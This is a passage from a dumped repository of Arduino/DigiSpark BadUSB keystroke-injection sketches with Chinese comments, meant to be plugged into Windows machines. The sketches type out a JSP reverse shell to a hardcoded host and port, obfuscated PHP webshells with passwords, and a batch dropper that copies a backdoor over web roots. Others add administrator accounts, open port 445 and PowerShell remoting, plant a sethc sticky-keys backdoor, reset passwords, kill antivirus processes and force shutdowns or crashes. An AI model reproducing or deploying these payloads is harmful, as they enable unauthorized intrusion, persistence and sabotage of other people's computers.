hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo           gih.flush();  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo         }  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo       } catch( Exception e ){}  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo       try  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo       {  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo         if( lv != null )  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo           lv.close();  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo         if( gih != null )  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo           gih.close();  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo       } catch( Exception e ){}  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo     }  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo   }  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo   try  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo   {  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo     String ShellPath;  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println('echo if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1) {  >> hacked.jsp');\n  delay(200); \n  Keyboard.println('echo   ShellPath = new String(\"/bin/sh\");  >> hacked.jsp');\n  delay(200); \n  Keyboard.println(\"echo } else {  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println('echo   ShellPath = new String(\"cmd.exe\");  >> hacked.jsp');\n  delay(200); \n  Keyboard.println(\"echo }  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println('echo     Socket socket = new Socket( \"192.168.154.131\", 4444 );  >> hacked.jsp');  //改为自己主机的IP地址和对应端口号\n  delay(200); \n  Keyboard.println(\"echo     Process process = Runtime.getRuntime().exec( ShellPath );  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo     ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo     ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo   } catch( Exception e ) {}  >> hacked.jsp\");\n  delay(200); \n  Keyboard.println(\"echo %^>  >> hacked.jsp\");\n  delay(200); \n  \n  Keyboard.println(\"echo @echo off >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo set 'FileName=index.aspx' >> hacked.bat\");  //目标文件index.aspx\n  delay(200); \n  Keyboard.println(\"echo echo 正在更新磁盘文件，请稍候... >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   if exist %%a:\\ ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     pushd %%a:\\ >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     for /r %%b in (*%FileName%) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     popd >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo ) >> hacked.bat\");\n  delay(200); \n  \n  Keyboard.println(\"hacked.bat\");  //放入jsp网站根目录，作为后门等待连接\n  delay(9000); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "Site_AWord_IntrusionCode/PHP_TrojanWrite(PHP_webServerUse-ClassBypass).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println(\"echo ^<?php >> hacked.php\");  //向hacked.php写内容,类绕过，密码wwy\n  delay(200);\n  Keyboard.println(\"echo class shawaf >> hacked.php\");\n  delay(200);\n  Keyboard.println(\"echo { >> hacked.php\");\n  delay(200);\n  Keyboard.println(\"echo   public $a = ''; >> hacked.php\");\n  delay(200);\n  Keyboard.println(\"echo   function __destruct(){ >> hacked.php\");\n  delay(200);\n  Keyboard.println('echo     assert(\"$this->a\"); >> hacked.php');\n  delay(200);\n  Keyboard.println(\"echo   } >> hacked.php\");\n  delay(200);\n  Keyboard.println(\"echo } >> hacked.php\");  \n  delay(200);\n  Keyboard.println(\"echo $b = new shawaf; >> hacked.php\");  \n  delay(200);\n  Keyboard.println('echo $b->a = $_POST[\"wwy\"]; >> hacked.php');  \n  delay(200);\n  Keyboard.println(\"echo ?^> >> hacked.php\");  \n  delay(200);\n\n  Keyboard.println(\"echo @echo off >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo set 'FileName=index.aspx' >> hacked.bat\");  //目标文件index.aspx\n  delay(200); \n  Keyboard.println(\"echo echo 正在更新磁盘文件，请稍候... >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   if exist %%a:\\ ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     pushd %%a:\\ >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     for /r %%b in (*%FileName%) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     popd >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo ) >> hacked.bat\");\n  delay(200); \n  \n  Keyboard.println(\"hacked.bat\");  //放入asp网站根目录，作为后门等待连接\n  delay(9000); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "Site_AWord_IntrusionCode/PHP_TrojanWrite(PHP_webServerUse-XOR-Bypass).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println(\"echo ^<?php  >> hacked.php\");  //向hacked.php写内容,密码_\n  delay(200); \n  Keyboard.println(\"echo $_=(''^'`').(''^'`').(''^'`');  >> hacked.php\");  //ass\n  delay(200); \n  Keyboard.println(\"echo $__=(''^'`').(''^'`').(''^'`');  >> hacked.php\");  //ert\n  delay(200); \n  Keyboard.println(\"echo $_ = $_.$__;  >> hacked.php\");  //assert\n  delay(200); \n  Keyboard.println(\"echo $__='_'.('\\''^'`').('%'^'`').('4'^'`');  >> hacked.php\");  //_GET\n  delay(200); \n  Keyboard.println(\"echo //$__='_'.('  >> hacked.php\");\n  delay(200); \n  Keyboard.println(\"echo //'^']').('/'^'`').(''^']').('\t'^']');  >> hacked.php\"); //_POST\n  delay(200); \n  Keyboard.println(\"echo $___=$$__;  >> hacked.php\");\n  delay(200); \n  Keyboard.println(\"echo @$_($___[_]);  >> hacked.php\");  //@assert($_GET[_])\n  delay(200); \n  Keyboard.println(\"echo ?^>  >> hacked.php\");\n  delay(200); \n  \n  Keyboard.println(\"echo @echo off >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo set 'FileName=index.aspx' >> hacked.bat\");  //目标文件index.aspx\n  delay(200); \n  Keyboard.println(\"echo echo 正在更新磁盘文件，请稍候... >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   if exist %%a:\\ ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     pushd %%a:\\ >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     for /r %%b in (*%FileName%) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     popd >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo ) >> hacked.bat\");\n  delay(200); \n  \n  Keyboard.println(\"hacked.bat\");  //放入asp网站根目录，作为后门等待连接\n  delay(9000); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "Site_AWord_IntrusionCode/PHP_TrojanWrite(usedByPHP_websiteServer).ino",
    "content": "#include<Keyboard.h>\n\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200); \n  Keyboard.println(\"echo ^<?php @eval($_POST['wwy']); ?^>  >> hacked.php\");  //向hacked.php写内容,密码wwy\n  delay(200); \n  \n  Keyboard.println(\"echo @echo off >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo set 'FileName=index.aspx' >> hacked.bat\");  //目标文件index.aspx\n  delay(200); \n  Keyboard.println(\"echo echo 正在更新磁盘文件，请稍候... >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo for %%a in (C D E F G H I J K L M N O P Q R S T U V W X Y Z) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   if exist %%a:\\ ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     pushd %%a:\\ >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     for /r %%b in (*%FileName%) do ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       if /i '%%~nxb' equ '%FileName%' ( >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo         copy %~p0hacked.aspx %%~dpb >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo       ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo     popd >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo   ) >> hacked.bat\");\n  delay(200); \n  Keyboard.println(\"echo ) >> hacked.bat\");\n  delay(200); \n  \n  Keyboard.println(\"hacked.bat\");  //放入asp网站根目录，作为后门等待连接\n  delay(9000); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "SpecificFunctionCode/AddUserCode(Tools).ino",
    "content": "#include <Keyboard.h>\n\nvoid setup() {\n  // 这里执行一次\n  Keyboard.begin();//开始键盘通讯 \n  delay(2000);//初始化时间\n  Keyboard.press(KEY_LEFT_GUI); //点击win键\n  delay(50); //延迟执行时间\n  Keyboard.press('r'); //点击r键\n  delay(50);\n  Keyboard.release(KEY_LEFT_GUI); //释放win键\n  Keyboard.release('r'); //释放r键\n  delay(50);\n  Keyboard.println(\"cmd.exe /T:01 /K mode CON: COLS=16 LINES=1\"); //打开cmd并将串口最小化\n  delay(100);\n  Keyboard.press(KEY_RETURN); //回车\n  Keyboard.release(KEY_RETURN); //释放回车\n  delay(50);\n  Keyboard.println(\"net user test 123456 /add&net localgroup Administrators test /add\"); //添加test用户\n  delay(1000);\n  Keyboard.press(KEY_RETURN);\n  Keyboard.release(KEY_RETURN);\n  delay(1000);\n  Keyboard.println(\"exit\");\n  delay(50);\n  Keyboard.press(KEY_RETURN);\n  Keyboard.release(KEY_RETURN);\n  Keyboard.end();//结束键盘通讯 \n}\n \nvoid loop() {\n  // 这里循环执行\n \n}"
  },
  {
    "path": "SpecificFunctionCode/Alt-f4_Loop.ino",
    "content": "void setup() {//初始化\nKeyboard.begin();\n}\nvoid loop()//循环\n{\n  Keyboard.press(KEY_LEFT_ALT);\n  Keyboard.press(KEY_F4);\n}\n"
  },
  {
    "path": "SpecificFunctionCode/ChangePasswordOfAccountUsed+CloseSystemProcess+BlueScreen(Tool).ino",
    "content": "#include<Keyboard.h>\nvoid setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题\n  Keyboard.release(KEY_CAPS_LOCK); //释放大写键\n  delay(200);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.println(\"cmd.exe\");\n  delay(200);\n  Keyboard.println(\"CMD.EXE /C REG DELETE hkcu\\\\sOFTWARE\\\\mICROSOFT\\\\wINDOWS\\\\cURRENTvERSION\\\\eXPLORER\\\\rUNmru /F&NET USER %USERNAME% HACKED\");//修改密码HACKED\n  delay(200); \n  Keyboard.println(\"color a\");//更改命令行颜色（绿色）\n  delay(200); \n  Keyboard.println(\"echo ........................................................   >> hacked.txt\");//向hacked.txt写内容\n  delay(200); \n  Keyboard.println(\"echo ##     ##    ###     ######  ##    ## ######## ########  >> hacked.txt\");//向hacked.txt写内容\n  delay(200); \n  Keyboard.println(\"color 0\");//更改命令行颜色（绿色）\n  delay(200); \n  Keyboard.println(\"echo ##     ##   ## ##   ##    ## ##   ##  ##       ##     ##  >> hacked.txt\");//向hacked.txt写内容\n  delay(200); \n  Keyboard.println(\"color 1\");//更改命令行颜色（绿色）\n  delay(200); \n  Keyboard.println(\"echo ##     ##  ##   ##  ##       ##  ##   ##       ##     ##  >> hacked.txt\");//向hacked.txt写内容\n  delay(200); \n  Keyboard.println(\"color 2\");//更改命令行颜色（绿色）\n  delay(200); \n  Keyboard.println(\"echo ######### ##     ## ##       #####    ######   ##     ##  >> hacked.txt\");//向hacked.txt写内容\n  delay(200); \n  Keyboard.println(\"color 3\");//更改命令行颜色（绿色）\n  delay(200); \n  Keyboard.println(\"echo ##     ## ######### ##       ##  ##   ##       ##     ##  >> hacked.txt\");//向hacked.txt写内容\n  delay(200); \n  Keyboard.println(\"color 4\");//更改命令行颜色（绿色）\n  delay(200); \n  Keyboard.println(\"echo ##     ## ##     ## ##    ## ##   ##  ##       ##     ##  >> hacked.txt\");//向hacked.txt写内容\n  delay(200); \n  Keyboard.println(\"color 5\");//更改命令行颜色（绿色）\n  delay(200); \n  Keyboard.println(\"echo ##     ## ##     ##  ######  ##    ## ######## ########   >> hacked.txt\");//向hacked.txt写内容\n  delay(200); \n  Keyboard.println(\"color 6\");//更改命令行颜色（绿色）\n  delay(200); \n  Keyboard.println(\"echo ........................................................   >> hacked.txt\");//向hacked.txt写内容\n  delay(200); \n  Keyboard.println(\"color c\");//更改命令行颜色（红色）\n  delay(200); \n  Keyboard.println(\"cls\");//更改命令行颜色（红色）\n  delay(200); \n  Keyboard.println(\"type hacked.txt\");//将hacked.txt文件内容打印在cmd\n  delay(200); \n  Keyboard.println(\"CMD /C START /MIN CMD /C REG DELETE hkcu\\\\sOFTWARE\\\\mICROSOFT\\\\wINDOWS\\\\cURRENTvERSION\\\\eXPLORER\\\\rUNmru /F&CMD /C START /MIN CMD /C NTSD -C Q -PN WINLOGON.EXE 1>NUL 2>NUL&TASKKILL /F /IM WININIT.EXE 2>NUL\");//蓝屏XP、7\n  delay(200); \n  Keyboard.println(\"taskkill /f /im explorer.exe\");//删除桌面进程(all)\n  delay(200); \n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}\n"
  },
  {
    "path": "SpecificFunctionCode/EnablePSL_RemoteConnection(Tools).ino",
    "content": "#define BOARDTYPE\n#ifdef TEENSY2\n    #include<usb_private.h>\n#endif\n\n# define PAYLOAD_USER_ADD \"net user INPUT0 INPUT1 /add\"\n# define PAYLOAD_GROUP_ADD \"net localgroup Administrators INPUT0 /add\"\n\nvoid setup(){\n delay(3000);\n  wait_for_drivers(2000);\n\n  minimise_windows();\n  delay(500);\n  while(!cmd_admin(3,500))\n  {\n  reset_windows_desktop(2000);\n  }\nadd_user();\nKeyboard.println(\"powershell.exe Enable-PSRemoting -SkipNetworkProfileCheck -Force;Set-NetFirewallRule –Name \\\"WINRM-HTTP-In-TCP-PUBLIC\\\" –RemoteAddress Any\");\ndelay(2000);\nKeyboard.println(\"exit\");\n}\n\nvoid loop(){\n}\n\nvoid add_user(){\ndelay(2000);\nKeyboard.println(PAYLOAD_USER_ADD);\ndelay(2000);\nKeyboard.println(PAYLOAD_GROUP_ADD);\ndelay(1000);\n\n}\n\nDEFS"
  },
  {
    "path": "SpecificFunctionCode/ForceShutDownCommand(Tool).ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(3000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.println(\"SHUTDOWN -S -F -T 0\"); \n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}\n"
  },
  {
    "path": "SpecificFunctionCode/ForcedDeletionOf360Processes(Tools).ino",
    "content": "void setup() {\nMouse.begin();//鼠标事件开始\nKeyboard.begin();\ndelay(7000);\n for(int i=0;i<20;i++){\n   Mouse.move(-127,-127);//鼠标移动(x,y)\n }\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(500); \n  Keyboard.println(\"\\\"C:\\\\Program Files (x86)\\\\360\\\\360Safe\\\\safemon\\\\360Tray.exe\\\" /disablesp 1\");\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(1000); \n  Keyboard.println(\"taskkill /F /IM explorer.exe\");\n  delay(3000);\n  for(int b=0;b<30;b++){\n    Mouse.move(20,0);\n    for(int a=0;a<100;a++){\n      Mouse.move(0,8);\n      Mouse.click();\n    }\n    for(int c=0;c<20;c++){\n    Mouse.move(0,-127);//鼠标移动(x,y)\n    }\n  }\nKeyboard.press(KEY_LEFT_CTRL);\nKeyboard.press(KEY_LEFT_ALT);\nKeyboard.press(KEY_DELETE);\nKeyboard.release(KEY_LEFT_CTRL);\nKeyboard.release(KEY_DELETE);\ndelay(2000);\nKeyboard.press('t');\nKeyboard.release('t');\ndelay(1000);\nKeyboard.press('f');\nKeyboard.press('n');\nKeyboard.release('f');\nKeyboard.release('n');\nKeyboard.release(KEY_LEFT_ALT);\ndelay(1000);\nKeyboard.print(\"explorer\");\nKeyboard.press(KEY_TAB);\nKeyboard.release(KEY_TAB);\ndelay(500);\nKeyboard.println(\" \");\ndelay(3000);\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  delay(1000); \n  Keyboard.println(\"cmd /c taskkill /F /IM taskmgr.exe&taskkill /F /IM 360Tray.exe&taskkill /F /IM ZhuDongFangYu.exe\");\nMouse.end();//鼠标事件结束\nKeyboard.end();\n}\nvoid loop() {\n  // put your main code here, to run repeatedly:\n\n}\n"
  },
  {
    "path": "SpecificFunctionCode/Hide_CMD_Window(Display).ino",
    "content": "//隐藏CMD窗口\nvoid setup() {\n  Keyboard.begin();\n  delay(3000);\n  Keyboard.press(KEY_LEFT_GUI);\n  delay(200); \n  Keyboard.print('r');\n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(1000); \n  //=========================Run==========================\n  Keyboard.println(\"CMD /t:01 /q /d /f:off /v:on /k MODE con: cols=30 lines=6\");\n  delay(1000);\n  Keyboard.press(KEY_LEFT_ALT);\n  delay(200); \n  Keyboard.press(' ');\n  delay(200); \n  Keyboard.release(KEY_LEFT_ALT);\n  Keyboard.release(' ');\n  delay(200);\n  Keyboard.print(\"m\");\n  Keyboard.press(KEY_LEFT_ARROW);\n  delay(3000);\n  Keyboard.release(KEY_LEFT_ARROW);\n  Keyboard.println();\n  //======================================================\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();\n}\n\nvoid loop() {\n}\n"
  },
  {
    "path": "SpecificFunctionCode/MouseKeepsMoving(Tools).ino",
    "content": "void setup() {\nMouse.begin();\n}\nvoid loop() {\nMouse.move(10,0);\ndelay(800);\nMouse.move(-10,0);\ndelay(800);\n}\n"
  },
  {
    "path": "SpecificFunctionCode/OpenPort445.ino",
    "content": "#include \"DigiKeyboard.h\"\n#define KEY_ESC     41\n#define KEY_BACKSPACE 42\n#define KEY_TAB     43\n#define KEY_PRT_SCR 70\n#define KEY_DELETE  76\n\nvoid setup() \n{\nDigiKeyboard.delay(5000);\nDigiKeyboard.sendKeyStroke(0);\nDigiKeyboard.delay(5000);\nDigiKeyboard.sendKeyStroke(KEY_M,MOD_GUI_LEFT);\nDigiKeyboard.delay(500);\nDigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);\nDigiKeyboard.delay(500);\nDigiKeyboard.print(F(\"cmd\"));\nDigiKeyboard.delay(500);\nDigiKeyboard.sendKeyStroke(KEY_ENTER);\nDigiKeyboard.delay(500);\nDigiKeyboard.print(F(\"netsh advfirewall firewall add rule name=\")); \nDigiKeyboard.print(char(34)); \nDigiKeyboard.print(F(\"open445\")); \nDigiKeyboard.print(char(34)); \nDigiKeyboard.print(F(\" dir=in protocol=tcp localport=445 action=allow\"));\nDigiKeyboard.sendKeyStroke(KEY_ENTER);\n\n}\n\n\nvoid loop() \n{\n\n}"
  },
  {
    "path": "SpecificFunctionCode/OpenSpecified_webPage.ino",
    "content": "void setup() {//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(3000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(200); \n  Keyboard.press('r');//r键 \n  delay(200); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(200); \n  Keyboard.println(\"HTTP://SHOP117137052.TAOBAO.COM\");\n  Keyboard.println();\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}\n"
  },
  {
    "path": "SpecificFunctionCode/ShiftBackdoor.ino",
    "content": "//Lemon_C Device Library\n//shop117137052.taobao.com\nvoid setup() {//初始化\n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.println(\"CMD /t:01 /q /d /f:off /v:on /k MODE con: cols=30 lines=6\");  //尽量隐藏命令行窗口\n  delay(1000);\n  Keyboard.press(KEY_LEFT_ALT);\n  delay(200); \n  Keyboard.print(\" \");\n  delay(200); \n  Keyboard.release(KEY_LEFT_ALT);\n  delay(200);\n  Keyboard.print(\"m\");\n  Keyboard.press(KEY_LEFT_ARROW);\n  delay(3000);\n  Keyboard.release(KEY_LEFT_ARROW);\n  delay(500);\n  Keyboard.println();\n  delay(500);\n  Keyboard.println(\"POWERSHELL.EXE -C START-PROCESS CMD -VERB RUNAS&&EXIT\");  //psl启动dos命令\n  //NEED BYPASS UAC NOW,SET DELAY=3S.\n  Keyboard.press(KEY_LEFT_ALT);\n  delay(3000);\n  Keyboard.print('Y');\n  Keyboard.releaseAll();\n  delay(2000);\n  //HIDE THE WINDOW\n  Keyboard.println();\n  Keyboard.println(\"CMD /t:01 /q /d /f:off /v:on /k MODE con: cols=30 lines=6&EXIT\");  //尽量隐藏窗口\n  delay(800);\n  Keyboard.press(KEY_LEFT_ALT);\n  delay(200); \n  Keyboard.print(\" \");\n  delay(200); \n  Keyboard.release(KEY_LEFT_ALT);\n  delay(200);\n  Keyboard.print(\"m\");\n  Keyboard.press(KEY_LEFT_ARROW);\n  delay(3000);\n  Keyboard.release(KEY_LEFT_ARROW);\n  delay(500);\n  Keyboard.println();\n  delay(500);\n  Keyboard.println(\"REG DELETE hkcu\\\\sOFTWARE\\\\mICROSOFT\\\\wINDOWS\\\\cURRENTvERSION\\\\eXPLORER\\\\rUNmru /F&TAKEOWN /F %sYSTEMrOOT%\\\\SYSTEM32\\\\SETHC.EXE&ICACLS %sYSTEMrOOT%\\\\SYSTEM32\\\\SETHC.EXE /GRANT ADMINISTARTORS:f&ECHO Y|CACLS %sYSTEMrOOT%\\\\SYSTEM32\\\\SETHC.EXE /g %username%:f&COPY C:\\\\WINDOWS\\\\SYSTEM32\\\\CMD.EXE C:\\\\WINDOWS\\\\SYSTEM32\\\\SETHC.EXE /y&EXIT\");  //替换SETHC文件，设置shift后门\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\nvoid loop()//循环\n{\n}\n"
  },
  {
    "path": "SpecificFunctionCode/SimplyChangeAllUsersPasswords(TrickItem).ino",
    "content": "#include<Keyboard.h>\nvoid setup() \n{//初始化\n  Keyboard.begin();//开始键盘通讯 \n  delay(5000);//延时\n  Keyboard.press(KEY_LEFT_GUI);//win键 \n  delay(500); \n  Keyboard.press('r');//r键 \n  delay(500); \n  Keyboard.release(KEY_LEFT_GUI);\n  Keyboard.release('r');\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(500); \n  Keyboard.println(\"CMD.EXE /C REG DELETE hkcu\\\\sOFTWARE\\\\mICROSOFT\\\\wINDOWS\\\\cURRENTvERSION\\\\eXPLORER\\\\rUNmru /F&NET USER %USERNAME% HACKED&EXIT\");\n  Keyboard.press(KEY_CAPS_LOCK);\n  Keyboard.release(KEY_CAPS_LOCK);\n  Keyboard.end();//结束键盘通讯 \n}\n\nvoid loop()//循环\n{\n}"
  },
  {
    "path": "SpecificFunctionCode/SimplyShutDownMachine(TrickItem).ino",
    "content": "#include <Keyboard.h>\n\nvoid setup()\n {\n  // put your setup code here, to run once:\n  Keyboard.begin();//开始键盘通讯\n  delay(5000);//延时\n  Keyboard.press(KEY_CAPS_LOCK);//开启大写锁\n  Keyboard.release(KEY_CAPS_LOCK);\n  delay(50);\n  Keyboard.press(KEY_LEFT_GUI);//win键\n  delay(500);\n  Keyboard.press('r');//r键\n  delay(500);\n  Keyboard.release(KEY_LEFT_GUI);//按住win+R\n  Keyboard.release('r');\n  Keyboard.print(\"cmd\");//输入cmd\n  Keyboard.press(KEY_RETURN);\n  Keyboard.release(KEY_RETURN);//回车\n  delay(500);\n  Keyboard.print(\"shutdown -s -t 0\");//关机\n  Keyboard.press(KEY_RETURN);\n  Keyboard.release(KEY_RETURN);//回车\n  Keyboard.end();\n}\n\nvoid loop() \n{\n\n}"
  },
  {
    "path": "SpecificFunctionCode/TakeScreenshot_SendSpecifiedFTP_Address(Tool).ino",
